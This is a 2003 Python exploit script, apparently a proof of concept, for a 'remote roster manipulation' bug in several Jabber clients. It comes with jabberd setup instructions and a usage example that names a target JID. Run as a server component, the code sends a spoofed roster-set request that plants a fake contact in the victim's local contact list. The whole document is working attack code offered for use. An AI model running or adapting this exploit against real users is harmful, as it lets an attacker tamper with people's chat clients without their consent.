#!/usr/bin/python # # exploit for "remote roster manipulation" bug of various Jabber clients # (c) 2003 Jacek Konieczny # # Requires: http://jabberpy.sourceforge.net/ # # This exploit is an external component to jabber server which adds # new item to victims roster (client local copy only) # # To link the exploit with your jabberd following fragment to your jabber.xml # and restart jabberd. # source.domain must be valid DNS hostname and point to your jabberd # # # source.domain # # 127.0.0.1 # secret # 6969 # # # # Usage: # ./exploit.py target-full-jid # # eg.: # ./exploit.py someone@jabber.nowhere/Home import jabber import xmlstream import sys def iq_handler(con,iq): print "Got IQ:",str(iq.asNode()) me="source.domain" con = jabber.Component(host='127.0.0.1', debug=0, port=6969, log='log') con.connect() con.process(1) con.auth('secret') con.setIqHandler(iq_handler) try: iq=jabber.Iq(to=sys.argv[1],type="set") iq.setFrom(me) query=iq.setQuery('jabber:iq:roster') group=xmlstream.Node("group") group.putData("Bugs") item=xmlstream.Node("item") item.putAttr("jid","bug@bug.nowhere") item.putAttr("name","BUG! BUG! BUG!") item.putAttr("subscription","none") item.insertNode(group) query.insertNode(item) con.send(iq) while(1): con.process(10) except KeyboardInterrupt: con.disconnect()